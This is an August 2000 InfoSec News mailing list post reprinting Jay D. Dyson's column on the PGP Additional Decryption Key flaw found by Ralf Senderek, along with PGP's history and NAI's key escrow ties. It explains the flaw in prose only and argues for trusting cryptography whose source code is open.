Information Security News mailing list archives

Previous By Date Next
Previous By Thread Next

Pretty Good Privacy?

From: InfoSec News <isn () C4I ORG>
Date: Thu, 31 Aug 2000 23:15:50 -0500
*********************************************************************
Ugly Mistake for Pretty Good
by Jay D. Dyson

    "If you think cryptography can solve your problem,
     then you don't understand your problem and you don't
     understand cryptography."
     -- Bruce Schneier

Pretty Good Privacy (PGP) has a long and colorful history.  Since its
debut in 1991 by cryptographer Phil Zimmermann, PGP attracted
immediate attention.  The notion of "public key encryption for the
masses"  achieved instant recognition not only from privacy advocates,
but the National Security Agency.  Over the years, PGP stood as a
bulwark for personal privacy amidst the introduction of the U.S.
government's Clipper proposal and increasingly expansive wiretapping
legislation.

An equally rocky legal history couples with PGP's turbulent political
history.  Issues regarding PGP's use of the RSA public key
implementation and charges of violating the U.S. International Traffic
in Arms Regulations (ITAR) continually dogged both the program and its
author.  To stave off these complications, PGP formed strategic
partnerships with ViaCrypt and MIT.  Then, in 1998, Network
Associates, Inc. (NAI) acquired PGP.

        http://www.cypherspace.org/~adam/timeline/
        http://www.freedomfighter.net/crypto/pgp-history.html

PGP had finally come of age.  Its "banditware" reputation faded into
the background, and it quickly achieved legitimacy in the eyes of
corporate America.  In December of 1999, PGP even earned an export
license by its once-greatest nemesis -- the U.S. Government.
Everything seemed rosy.

However, NAI, the proud owner of PGP, also happened to belong to the
Key Recovery Alliance, an organization advocating government key
escrow.  Though NAI disavowed its membership with the KRA in 1997, it
quietly resumed ties with the organization.  To that end, NAI also
continued their work with Additional Decryption Keys (ADK) with PGP.
ADKs, introduced as an alternative to key escrow, were touted as a
feature for businesses using PGP.  With ADKs, a company can add a
master key to the user's public key.  That way, if an employee leaves
the company, the company will still be able to decrypt that employee's
files. What could possibly be wrong with that?

Plenty.

        http://www.fitug.de/debate/9811/msg00233.html
        http://www.cdt.org/crypto/risks98/

Shortly after ADK's 1998 inclusion into PGP, many in the cryptographic
community began voicing concerns regarding its use.  The most ominous
among them was Ralf Senderek's evaluation that read in part:

    "I do not know which mechanism will prevent a user's public
     key to be linked with another faked message recovery key
     without the user's consent or knowledge."

Two years later, his concern was validated.  On August 24, 2000, Ralf
Senderek discovered vulnerability in version 5 and 6 PGP public keys
to unauthorized ADK modification.  Some versions of PGP respond to ADK
subpackets in the non-signed part of the public key data structure.
Thus, any third party could issue a tampered copy of one's PGP public
key containing their own public key.  Anything encrypted on Jane
User's public key would then also be encrypted on Joe Intruder's
public key, effectively giving Joe access to any and all private data
meant only for Jane's eyes.

        http://senderek.de/security/key-experiments.html
        http://cryptome.org/pgp-badbug.htm

As Senderek points out, the problem won't go away until all vulnerable
PGP versions are retired, since it's the sender responsible for
encrypting to the ADKs, not the recipient. Keep in mind, the vast
majority of NAI PGP users also use programs such as MS Outlook
(already demonstrably insecure considering the "Melissa" and "I Love
You"  variants that brought such systems to their knees).  Supposing
they would not detect an unauthorized ADK attack if they experienced
it requires no suspension of belief.

The fallout of this revelation was swift.  Amongst the hue and cry
over Senderek's report came wholesale PGP keyserver cleansing efforts
and a sudden groundswell of people speaking out against PGP's use,
favoring instead other public key cryptographic programs such as Gnu
Privacy Guard (GPG).  Even seasoned users of the older versions of PGP
questioned its continued use.

        "[They] became so preoccupied with whether or not they
        *could* that they didn't stop to think if they *should*."
        -- Ian Malcolm (from Jurassic Park)

PGP's philosophy and use is sound; however, NAI sacrificed the core
security on which every public key cryptographic system relies in its
rush to implement new "value-added" features.  In doing so, they have
also risked hard-won confidence PGP cultivated since first distributed
across the Internet.

Many others, including myself, have long since abandoned use of any
cryptographic system that does not make freely available its source
code. This latest incident only serves to galvanize my stance.  While
I will continue using NAI's version of PGP as my customers may
require, I will only trust the version that I have personally reviewed
and compiled.  This may seem backward to some, but it is essential to
me.  In looking back on the events of this past week, I have to concur
with Senderek's latest comment:

        "This is not a bug, this is a scandal..."


Resources

Flaw found in PGP code
Defect allows attacker to decrypt personal data
http://www2.itworld.com/cma/ett_article_frame/0,2848,1_2310,00.html

Attacking Linux
To stop an attacker, think like a cracker
http://www.linuxworld.com/linuxworld/lw-2000-08/lw-08-expo00-hacking.html

RSA upgrading its Keon PKI security software
http://www2.itworld.com/cma/ett_article_frame/0,2848,1_2347,00.html

Freeware encryption as alternative to PGP
GnuPG exempt from government export restrictions
http://www.linuxworld.com/linuxworld/lw-1999-01/lw-01-gnupg.html

************************************************************************
************************************************************************
About the author
----------------

Jay D. Dyson is a senior security consultant for OneSecure, Inc., a
company specializing in managed network and host security services.
He also serves as a part-time consultant on security issues for the
National Aeronautics and Space Administration in Pasadena.  He has
been a system administrator for over 15 years on various platforms.
*********************************************************************

*********************************************************************
CUSTOMER SERVICE

You can subscribe or unsubscribe to any of your e-mail newsletters by
updating your form at:
http://www.itworld.com/cgi-bin/w3-msql/newsletters/subcontent12.html?

For subscription changes that cannot be handled via the web, please send
an email to our customer service dept: support () itworld com
*********************************************************************

http://www.itworld.com

ISN is hosted by SecurityFocus.com
---
To unsubscribe email LISTSERV () SecurityFocus com with a message body of
"SIGNOFF ISN".
Previous By Date Next
Previous By Thread Next

Current thread: